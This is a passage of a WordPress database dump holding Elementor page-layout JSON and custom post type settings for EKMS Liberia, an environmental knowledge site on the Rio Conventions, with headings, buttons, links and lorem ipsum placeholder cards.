layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(5941,537,'_elementor_version','2.7.5'),(5942,537,'_elementor_template_type','wp-page'),(5944,538,'_elementor_controls_usage','a:0:{}'),(5945,538,'label_singular','MEA Resource'),(5946,538,'public','1'),(5947,538,'show_ui','1'),(5948,538,'supports_title','1'),(5949,538,'supports_editor','1'),(5950,538,'type','post_type'),(5951,538,'storage','meta'),(5952,9,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(5954,538,'old_name','mea_resource'),(5955,538,'publicly_queryable','1'),(5956,538,'exclude_from_search','0'),(5957,538,'capability_type','page'),(5958,538,'capability_type_custom','mea_resource'),(5959,538,'capability_type_extra','1'),(5960,538,'has_archive','0'),(5961,538,'hierarchical','0'),(5962,538,'rewrite','1'),(5963,538,'rewrite_with_front','1'),(5964,538,'rewrite_feeds','0'),(5965,538,'rewrite_pages','1'),(5966,538,'query_var','1'),(5967,538,'can_export','1'),(5968,538,'default_status','draft'),(5969,538,'supports_author','0'),(5970,538,'supports_thumbnail','1'),(5971,538,'supports_excerpt','1'),(5972,538,'supports_trackbacks','0'),(5973,538,'supports_custom_fields','0'),(5974,538,'supports_comments','0'),(5975,538,'supports_revisions','0'),(5976,538,'supports_page_attributes','0'),(5977,538,'supports_post_formats','0'),(5978,538,'built_in_taxonomies_category','0'),(5979,538,'built_in_taxonomies_elementor_library_category','0'),(5980,538,'built_in_taxonomies_elementor_library_type','0'),(5981,538,'built_in_taxonomies_link_category','0'),(5983,538,'built_in_taxonomies_post_tag','0'),(5984,538,'built_in_taxonomies_resource_category','0'),(5985,538,'built_in_taxonomies_resource_tag','1'),(5986,538,'built_in_taxonomies_resource_type','1'),(5988,538,'show_in_menu','1'),(5989,538,'menu_position','0'),(5990,538,'menu_icon','dashicons-flag'),(5991,538,'show_in_nav_menus','1'),(5992,538,'show_in_admin_bar','1'),(5993,538,'pfat_enable','0'),(5994,538,'pfat_run_outside_loop','0'),(5995,538,'pfat_single','Document Resources Template'),(5996,538,'pfat_append_single','append'),(5997,538,'pfat_filter_single','the_content'),(5998,538,'pfat_append_archive','append'),(5999,538,'pfat_filter_archive','the_content'),(6000,538,'rest_enable','0'),(6001,538,'read_all','0'),(6002,538,'write_all','0'),(6006,539,'_wp_page_template','default'),(6007,539,'_elementor_edit_mode','builder'),(6008,539,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Knowledge Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"ef3f9e0\",\"elType\":\"widget\",\"settings\":{\"cards_list\":[{\"is_item_active\":\"yes\",\"item_title\":\"Card #1\",\"item_desc\":\"Lorem ipsum dolor sit amet, mea ei viderer probatus consequuntur, sonet vocibus lobortis has ad. Eos erant indoctum an, dictas invidunt est ex, et sea consulatu torquatos. Nostro aperiam petentium eu nam, mel debet urbanitas ad, idque complectitur eu quo. An sea autem dolore dolores.\",\"item_meta\":\"Thursday, August 31, 2018\",\"_id\":\"016011b\",\"show_item_image\":\"\",\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/plugins\\/elementor\\/assets\\/images\\/placeholder.png\",\"id\":\"\"},\"item_image_size\":\"medium\",\"item_image_custom_dimension\":{\"width\":\"\",\"height\":\"\"},\"item_point_type\":\"icon\",\"selected_item_point_icon\":{\"value\":\"fas fa-calendar-alt\",\"library\":\"fa-solid\"},\"item_point_text\":\"A\",\"item_btn_text\":\"\",\"item_btn_url\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"item_title\":\"Card #2\",\"item_desc\":\"Lorem ipsum dolor sit amet, mea ei viderer probatus consequuntur, sonet vocibus lobortis has ad. Eos erant indoctum an, dictas invidunt est ex, et sea consulatu torquatos. Nostro aperiam petentium eu nam, mel debet urbanitas ad, idque complectitur eu quo. An sea autem dolore dolores.\",\"item_meta\":\"Thursday, August 29, 2018\",\"_id\":\"47b6ff5\",\"is_item_active\":\"\",\"show_item_image\":\"\",\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/plugins\\/elementor\\/assets\\/images\\/placeholder.png\",\"id\":\"\"},\"item_image_size\":\"medium\",\"item_image_custom_dimension\":{\"width\":\"\",\"height\":\"\"},\"item_point_type\":\"icon\",\"selected_item_point_icon\":{\"value\":\"fas fa-calendar-alt\",\"library\":\"fa-solid\"},\"item_point_text\":\"A\",\"item_btn_text\":\"\",\"item_btn_url\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"item_title\":\"Card #3\",\"item_desc\":\"Lorem ipsum dolor sit amet, mea ei viderer probatus consequuntur, sonet vocibus lobortis has ad. Eos erant indoctum an, dictas invidunt est ex, et sea consulatu torquatos. Nostro aperiam petentium eu nam, mel debet urbanitas ad, idque complectitur eu quo. An sea autem dolore dolores.\",\"item_meta\":\"Thursday, August 28, 2018\",\"_id\":\"faae797\",\"is_item_active\":\"\",\"show_item_image\":\"\",\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/plugins\\/elementor\\/assets\\/images\\/placeholder.png\",\"id\":\"\"},\"item_image_size\":\"medium\",\"item_image_custom_dimension\":{\"width\":\"\",\"height\":\"\"},\"item_point_type\":\"icon\",\"selected_item_point_icon\":{\"value\":\"fas fa-calendar-alt\",\"library\":\"fa-solid\"},\"item_point_text\":\"A\",\"item_btn_text\":\"\",\"item_btn_url\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"item_title\":\"Card #4\",\"item_desc\":\"Lorem ipsum dolor sit amet, mea ei viderer probatus consequuntur, sonet vocibus lobortis has ad. Eos erant indoctum an, dictas invidunt est ex, et sea consulatu torquatos. Nostro aperiam petentium eu nam, mel debet urbanitas ad, idque complectitur eu quo. An sea autem dolore dolores.\",\"item_meta\":\"Thursday, August 27, 2018\",\"_id\":\"ca6c02e\",\"is_item_active\":\"\",\"show_item_image\":\"\",\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/plugins\\/elementor\\/assets\\/images\\/placeholder.png\",\"id\":\"\"},\"item_image_size\":\"medium\",\"item_image_custom_dimension\":{\"width\":\"\",\"height\":\"\"},\"item_point_type\":\"icon\",\"selected_item_point_icon\":{\"value\":\"fas fa-calendar-alt\",\"library\":\"fa-solid\"},\"item_point_text\":\"A\",\"item_btn_text\":\"\",\"item_btn_url\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}]},\"elements\":[],\"widgetType\":\"jet-horizontal-timeline\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the 